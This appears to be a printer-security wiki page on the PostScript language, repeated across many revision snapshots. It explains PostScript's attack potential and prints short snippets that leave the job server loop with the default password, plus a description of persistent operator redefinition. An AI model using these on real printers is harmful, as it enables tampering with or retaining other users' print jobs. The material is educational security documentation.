graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 64c2c95e49ba4b008951f79e4f4887f86aa58f8c 206 205 2017-01-23T16:22:28Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === <!-- when running in a printer is that the separtion of print ... can be bypassed ‘The conventional model of a PostScript interpreter is a “print server” — a single-threaded process that consumes and executes a sequence of “print jobs”, each of which is a complete, independent PostScript program. --> One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 01954905aefae2fefb06de832b5cd21e158f2c1a 205 204 2017-01-23T16:20:45Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === <!-- when running in a printer is that the separtion of print ... can be bypassed ‘The conventional model of a PostScript interpreter is a “print server” — a single-threaded process that consumes and executes a sequence of “print jobs”, each of which is a complete, independent PostScript program. --> One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop by using exitserver will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- f07d8c235822dba40a155bc4724b24faec6b2c21 204 203 2017-01-23T16:20:09Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === <!-- when running in a printer is that the separtion of print ... can be bypassed ‘The conventional model of a PostScript interpreter is a “print server” — a single-threaded process that consumes and executes a sequence of “print jobs”, each of which is a complete, independent PostScript program. --> One interesting feature of PostScript is that ‘a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref>. To do so, it can use either ''startjob'', a Level 2 feature: <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> or ''exitserver'' (available in all implementations that include a job server): <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> This capability is controlled by by the ''StartJobPassword'' which defaults to <code>0</code> (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop by using exitserver will remain as part of the permanent state of the interpreter for all subsequent jobs <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176</ref>. === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- db756770b6b2c7cb6b07c2dec3b58290591e23fd 203 132 2017-01-23T16:07:42Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. == Security features == === Exiting the server loop === One intersting fact about PostScript when running in a printer is that the separtion of print ... can be bypassed ‘The conventional model of a PostScript interpreter is a “print server” — a single-threaded process that consumes and executes a sequence of “print jobs”, each of which is a complete, independent PostScript program. [...] A program can circumvent job encapsulation and alter the initial VM for subsequent jobs. To do so, it can use either ''startjob'' (LanguageLevel 2) or ''exitserver'' (available in all implementations that include a job server). This capability is controlled by a password.’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72</ref> To exit the server loop using the default ''StartJobPassword'' (<code>0</code>, compare [[Credential disclosure#PostScript|credential disclosure]]), <syntaxhighlight lang=postscript> true 0 startjob </syntaxhighlight> <syntaxhighlight lang=postscript> serverdict begin 0 exitserver </syntaxhighlight> ‘Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop by using exitserver will remain as part of the permanent state of the interpreter for all subsequent jobs. This only applies to changes to VM (like procedure definitions), since the stacks and graphics state are cleared after each job.’ <ref>''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (‘Green Book’),]'', Adobe Systems Inc., 1988, p. 176</ref> === Operator redefinition === When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below: [[File:Dictstack.png|300px|The PostScript dictionary stack]] The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attackers version will be executed. This can lead to a various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32 years old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 893980ccee24642ca8ce234556b4413a71d6f9ed 132 126 2017-01-14T20:00:26Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- 9186eacb600aeabca91fc57fc14febf77103d9ea 126 87 2017-01-14T19:56:13Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: <syntaxhighlight lang=postscript> %! (Hello world) print </syntaxhighlight> While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- eb108a18dfc3a0a47a9236d75b0b4d8cd1d77b35 87 75 2017-01-09T10:00:11Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: %! (Hello world) print While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. → ''Related aricles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- db2574becd7c6ce57e0771e58127e2310ebba252 75 74 2017-01-08T18:17:18Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term `page description' may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetics, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically spoken, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters. In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication been host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below: %! (Hello world) print While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]]. → ''Related aricles:'' [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]] <!-- what about Configurable PostScript Interpreter (CPSI) technology? --> ----- e88ef378a8a522551d9db3f3bc7f4387b24a81b3 74 8 2017-01-08T18:15:06Z Admin 1 wikitext text/x-wiki The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 <ref>''PostScript Language Reference Manual'', Adobe Systems Inc., 1985</ref>, PostScript Level 2 <ref>''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992</ref>, PostScript 3 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999</ref> and in various language supplements. While PostScript has lost popularity in desktop publishing and as 